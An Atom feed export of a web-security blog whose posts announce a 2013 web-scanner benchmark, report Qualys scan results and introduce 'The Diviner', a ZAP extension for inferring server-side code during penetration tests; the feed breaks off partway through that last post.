Wavsep was already enhanced to v1.5 (with hundreds of additional test cases that will be published &lt;b&gt;after&lt;/b&gt; the upcoming benchmark),&lt;br /&gt;
&lt;br /&gt;
The vast majority of commercial vendors already provided me with a valid license and installation, and at least half of the planned open source projects were either tested or currently being tested.&lt;br /&gt;
&lt;br /&gt;
I&#39;m planning to release the information gathered in two or three bulks -&lt;br /&gt;
&lt;br /&gt;
(*) The typical benchmark and analysis (including at least two new vulnerability detection comparison aspects which will remain obscure at the moment - for the sake of the competition).&lt;br /&gt;
(*) An analysis of the DAST market status, based on the results and additional information gathered during the test.&lt;br /&gt;
&lt;br /&gt;
I&#39;m also planning to upload the results into a dynamic publication framework (partially implemented), although the first bulk of information will probably be published in the blog and static &lt;a href=&quot;http://www.sectoolmarket.com/&quot; target=&quot;_blank&quot;&gt;sectoolmarket &lt;/a&gt;website.&lt;br /&gt;
&lt;br /&gt;
In short, stay tuned, results will be published soon .&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/8732302219326883434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2013/12/the-2013-scanner-benchmark-is-coming.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8732302219326883434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8732302219326883434'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2013/12/the-2013-scanner-benchmark-is-coming.html' title='The 2013 scanner benchmark is coming soon!'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-8271063752491585023</id><published>2013-05-19T12:06:00.006-07:00</published><updated>2013-05-19T12:06:50.934-07:00</updated><title type='text'>Security Benchmarks &amp; Comparisons – Plans for 2013</title><content type='html'>&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
It&#39;s
kind of hard to admit that your current strategy leads to a dead end… Hard,
but liberating.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
I initially
started this blog because I was searching for a way to sort through an insane
amount of tools I collected over the years - so we can all weed out the irrelevant
and stick with what works.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Obviously,
things got a little complicated, and after doing double shifts and spending half
my nights over the past 4 years on comparisons, I realize now that I &lt;b&gt;only&lt;/b&gt;
covered &lt;b&gt;60-70&lt;/b&gt; tools.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Sure,
I had a good reason to do so - learning curve, comprehensiveness, accuracy, credibility,
evolution… but the numbers don&#39;t lie.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
As
much as I like the idea of a one man army, the current rate is NOT what I
expected, and to achieve something greater, I&#39;ll need to get some resources and
some help (yeah yeah, mental too).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Nope,
that DOES &lt;b&gt;NOT&lt;/b&gt; mean that I&#39;m about to stop any of my planned activities,
researches or benchmarks.&amp;nbsp;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; line-height: 115%;&quot;&gt;Giving
up is for wusses.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
It
does mean, however, that I&#39;m going to make some changes that will enable me to
cover &lt;b&gt;more,&lt;/b&gt; even if I have to make some decisions I was dreading and trying
to postpone.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
So
what I&#39;m planning for 2013 is to branch out and cover &lt;b&gt;additional types of
tools &amp;amp; products&lt;/b&gt;, &lt;b&gt;in addition&lt;/b&gt; to vulnerability scanners.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
That
means updating WAVSEP with some hybrid issues, becoming less of a control
freak, let go the leash I was so inclined on keeping, and probably even
creating additional comparison platforms.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Yep…
b&amp;nbsp; &amp;nbsp;a&amp;nbsp; &amp;nbsp;c&amp;nbsp; &amp;nbsp;k&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;t&amp;nbsp; &amp;nbsp;o &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;w &amp;nbsp;&amp;nbsp;o&amp;nbsp; &amp;nbsp;r&amp;nbsp; &amp;nbsp;k.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/8271063752491585023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2013/05/security-benchmarks-comparisons-plans.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8271063752491585023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8271063752491585023'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2013/05/security-benchmarks-comparisons-plans.html' title='Security Benchmarks &amp; Comparisons – Plans for 2013'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-2202494361657648488</id><published>2012-07-30T16:04:00.000-07:00</published><updated>2012-08-27T08:22:49.317-07:00</updated><title type='text'>SAAS Scanners (Qualys) vs Commercial Scanners</title><content type='html'>The results of Qualys -&amp;nbsp;a SAAS scanning service provider were added to &lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com&lt;/a&gt;.&lt;br /&gt;
Qualys got great scores in WIVET, SQLi &amp;amp; RXSS, but don&#39;t detect RFI/Path Traversal cases, and I&#39;m currently not sure if it&#39;s my testing methodology, bugs or the&amp;nbsp;absence&amp;nbsp;of appropriate plugins.&lt;br /&gt;
Link to the 2012 benchmark:&lt;a href=&quot;http://sectooladdict.blogspot.co.il/2012/07/2012-web-application-scanner-benchmark.html&quot; target=&quot;_blank&quot;&gt;&amp;nbsp;&lt;b&gt;http://bit.ly/LloTfL&lt;/b&gt;&lt;/a&gt;&amp;nbsp;(Qualys results are only included in sectoolmarket)</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/2202494361657648488/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/saas-scanners-qualys-vs-commercial-open.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2202494361657648488'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2202494361657648488'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/saas-scanners-qualys-vs-commercial-open.html' title='SAAS Scanners (Qualys) vs Commercial Scanners'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7652889091954800711</id><published>2012-07-30T15:10:00.001-07:00</published><updated>2012-08-27T08:23:48.437-07:00</updated><title type='text'>The Diviner - Clairvoyance in the Digital Frontier</title><content type='html'>&lt;br /&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 72pt; line-height: 115%;&quot;&gt;The
Diviner&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 36pt; line-height: 115%;&quot;&gt;Digital
Clairvoyance&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 36pt; line-height: 115%;&quot;&gt;Server-Side
Source Code and Memory Divination&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 14pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 14pt; line-height: 115%;&quot;&gt;How to gain insight into
the server-side source code and memory structure of any application, using
black box techniques and without relying on any security exposures.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 14pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
By &lt;a href=&quot;http://twitter.com/sectooladdict/&quot;&gt;Shay Chen&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a href=&quot;http://twitter.com/secure_et&quot;&gt;Eran Tamari&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
POC is implemented as a ZAP proxy &lt;a href=&quot;http://code.google.com/p/diviner/&quot;&gt;&lt;b&gt;extension&lt;/b&gt;&lt;/a&gt;, developed by &lt;a href=&quot;http://www.hacktics.com/&quot;&gt;&lt;b&gt;Hacktics ASC&lt;/b&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 203.85pt;&quot; valign=&quot;top&quot; width=&quot;272&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Download:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://code.google.com/p/diviner/&quot;&gt;The Diviner Extension Homepage&lt;/a&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 222.25pt;&quot; valign=&quot;top&quot; width=&quot;296&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Demonstration
  Videos:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=RmxiUL8ImkA&amp;amp;feature=plcp&quot;&gt;Source
  Code Divination&lt;/a&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=YKfIIVi8IN8&amp;amp;feature=plcp&quot;&gt;Persistent
  SQL Injection&lt;/a&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.youtube.com/watch?v=YKfIIVi8IN8&amp;amp;feature=plcp&quot;&gt;Persistent
  XSS Detection&lt;/a&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95W_W2CLZ8FUA6qLUZqJ3BjHxHounKjFzaJ50YH3_H75eAzm8G20JDWznWRu4a-x2fa7MO-BVY_oQYbETBi1MpdOViS7l8BzOxKqLfeu_z2GsIvD8YK48Uot7TFkuw920VTs-FwmY0UA/s1600/DivinerLogo.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;314&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95W_W2CLZ8FUA6qLUZqJ3BjHxHounKjFzaJ50YH3_H75eAzm8G20JDWznWRu4a-x2fa7MO-BVY_oQYbETBi1MpdOViS7l8BzOxKqLfeu_z2GsIvD8YK48Uot7TFkuw920VTs-FwmY0UA/s320/DivinerLogo.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;Introduction&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
There&#39;s a LOT of quality infosec publications lately, in blog posts,
articles, videos and whitepapers. Even though I try my best, I admit it&#39;s hard for
me to keep up. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although this post is one of these publications, I already admit that the
title sounds a bit confusing and maybe even scary, and I am aware of that since
that&#39;s a response I got from many individuals.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
So what&#39;s so &lt;b&gt;special&lt;/b&gt; in this post that should make you want to &lt;b&gt;invest
5 minutes&lt;/b&gt; of your precious time to read it?&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I could tell you stories about research and development work that&#39;s been
going on for more than a year, or mention the fact that it contains an entirely
&lt;b&gt;new&lt;/b&gt; &lt;b&gt;concept&lt;/b&gt; in hacking, but &lt;i&gt;I think I&#39;ll take the direct
approach with this one&lt;/i&gt;:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 13pt; line-height: 115%;&quot;&gt;Using a &lt;b&gt;new
technology&lt;/b&gt; that relies on black box techniques, the &lt;b&gt;server-side source
code&lt;/b&gt; of any application can be &lt;b&gt;stolen&lt;/b&gt;, the &lt;b&gt;server side memory&lt;/b&gt;
can be &lt;b&gt;mapped&lt;/b&gt;, and so can the &lt;b&gt;data flow&lt;/b&gt; of &lt;b&gt;server side values&lt;/b&gt;.
&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 13pt; line-height: 115%;&quot;&gt;The technique is already
implemented in a &lt;b&gt;new tool&lt;/b&gt;, does &lt;b&gt;not &lt;/b&gt;rely on any &lt;b&gt;security
exposures&lt;/b&gt;, and works &lt;b&gt;regardless&lt;/b&gt; of any existing &lt;b&gt;security
enhancements&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 13pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
No introductions, obscure concepts or murky waters. Just facts - Get
Code, Get Memory Map, No Security, Any Application.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;i&gt;Let&#39;s assume for a moment that the proclamations are true - so how
can this information be used in penetration tests?&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although the posts in this blog were recently focused at automated
scanning, it&#39;s never too late to correct the faults. Any veteran knows that the
focus of any tester should always be the manual testing process, and this new information&lt;b&gt;,
&lt;/b&gt;when properly presented to a tester&lt;b&gt;, &lt;/b&gt;can dramatically&lt;b&gt; enhance &lt;/b&gt;the
process of &lt;b&gt;&lt;u&gt;a manual penetration test&lt;/u&gt;:&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Optimization
of the manual testing process&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; - allow the tester to make better
decisions, faster and test entry points that are more likely to be vulnerable
first.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Gaining
Intel&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; - enable the tester to &lt;b&gt;understand&lt;/b&gt; how a &lt;b&gt;certain
page&lt;/b&gt; / entry point &lt;b&gt;behaves&lt;/b&gt; under various conditions, by viewing a
representation of the server-side source code, memory and cross-entry-point
processes.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Locate
complex vulnerabilities&lt;/u&gt;&lt;/b&gt; - locate leads for vulnerabilities that require
access to &lt;b&gt;multiple entry points&lt;/b&gt;, while overriding session and database
values, with various perquisites and in extreme scenarios. Vulnerabilities that
cannot be detected by automated tools, and are hard to locate even in manual
assessments.&lt;/li&gt;
&lt;li&gt;Think
about it… viewing the server-side source code of any component… criteria or
not, it&#39;s simply awesome.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In addition, if the information can be delivered in a standard format to
a black box web application scanner, it can enhance the coverage of the tool to
include potential events and behaviors that only occur under extreme or rare
conditions.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;i&gt;And what enables us to gather this information using nothing but
black box techniques?&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Well, I can only define it as... umm... &lt;b&gt;breadcrumbs&lt;/b&gt;. Many tiny, seemingly useless pieces of information.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
So if having the ability to gain &lt;b&gt;Insight&lt;/b&gt; into the server side,
reducing the time necessary to perform many types of tests and being able to
locate vulnerabilities that nobody else can detect without &lt;b&gt;sheer luck&lt;/b&gt; is
of any interest to you, hang on a bit. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
And just to make sure you&#39;re not losing track, here&#39;s one way to present
it:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;Activating Diviner&#39;s Clairvoyance feature - viewing a
representation of the server side code&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYtnnSrkZquV2UIV0g0dbQ57lEDY-rUjhQxu7BgqALqWd89XL0V-Ko69bP8uTd0LEVZSAvyOFx-fzQVU9B7OKrQM8Ae1V8Y4ZjPcHNiq1sMCM3Xvq-mPvriWt5_RlbKNQmoOLh8-pMnqk/s1600/diviner-poc-server-source-code-divination-clairvoyance-feature.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;454&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYtnnSrkZquV2UIV0g0dbQ57lEDY-rUjhQxu7BgqALqWd89XL0V-Ko69bP8uTd0LEVZSAvyOFx-fzQVU9B7OKrQM8Ae1V8Y4ZjPcHNiq1sMCM3Xvq-mPvriWt5_RlbKNQmoOLh8-pMnqk/s640/diviner-poc-server-source-code-divination-clairvoyance-feature.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
